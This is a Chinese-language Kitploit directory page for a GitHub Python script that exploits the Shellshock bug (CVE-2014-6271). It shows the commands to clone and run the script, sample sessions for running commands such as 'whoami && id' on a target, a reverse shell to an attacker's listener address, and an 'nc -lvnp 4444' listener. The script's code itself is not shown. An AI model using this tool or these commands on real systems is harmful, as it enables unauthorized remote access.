Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2014-6271-SHELLSHOCK — 利用Shellshock漏洞的自动化脚本。 | Kitploit
工具/GitHubGitHub/yunchohang/cve-2014-6271-shellshock
漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育远程访问工具
GitHubyunchohang/cve-2014-6271-shellshock

CVE-2014-6271-SHELLSHOCK

利用Shellshock漏洞的自动化脚本。

查看仓库
21年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2014-6271-SHELLSHOCK

🐚 Shellshock 利用脚本 🎯💻🔍

本 Python 脚本利用 Shellshock 漏洞(CVE-2014-6271)在易受攻击的目标上远程执行命令或建立反向 shell。🛠️⚠️


⚠ 免责声明 🚨❗

此脚本仅用于教育目的和授权的渗透测试。未经明确许可对您无权测试的系统进行未经授权的使用是非法且不道德的。在进行任何安全测试之前,请务必获得适当授权。⚠️🛑🚔


🔥 特性

  • 使用 Shellshock 漏洞在易受攻击的系统上执行任意命令。
  • 建立到攻击者机器的反向 shell 连接。

📌 前提条件 🎓

  • 易受 Shellshock 攻击的系统(例如,启用了 CGI 的过时 Apache 服务器)。
  • 已安装 Python 3。
  • 系统上已安装 curl。

📥 安装

克隆仓库:

root@kitploit:~
git clone https://github.com/YunchoHang/CVE-2014-6271-SHELLSHOCK.git
cd CVE-2014-6271-SHELLSHOCK

🚀 用法

运行脚本:

root@kitploit:~
python3 AutoShocker.py

🔘 选项

  1. 使用 curl 运行命令 – 允许在目标机器上执行任意命令。
  2. 获取反向 shell – 建立到攻击者机器的反向 shell 连接。

💡 使用示例

命令执行:

root@kitploit:~
python3 AutoShocker.py
Enter the target IP: 192.168.1.100
Choose an option (1 or 2): 1
Enter the commands you want to execute: whoami && id

反向 shell:

root@kitploit:~
python3 AutoShocker.py
Enter the target IP: 192.168.1.100
Choose an option (1 or 2): 2
Enter your IP (listener): 192.168.1.200
Enter the port for reverse shell (e.g., 4444): 4444

在您的机器上启动监听器:

root@kitploit:~
nc -lvnp 4444

⚠ 警告

  • 不要 使用此工具进行未经授权的访问。
  • 在没有权限的情况下在机器上运行此工具是非法的。
  • 在执行安全测试之前,请确保您拥有明确的授权。

📜 许可证

本项目仅用于教育目的。作者对任何滥用行为概不负责。📖⚠️🔍

下载工具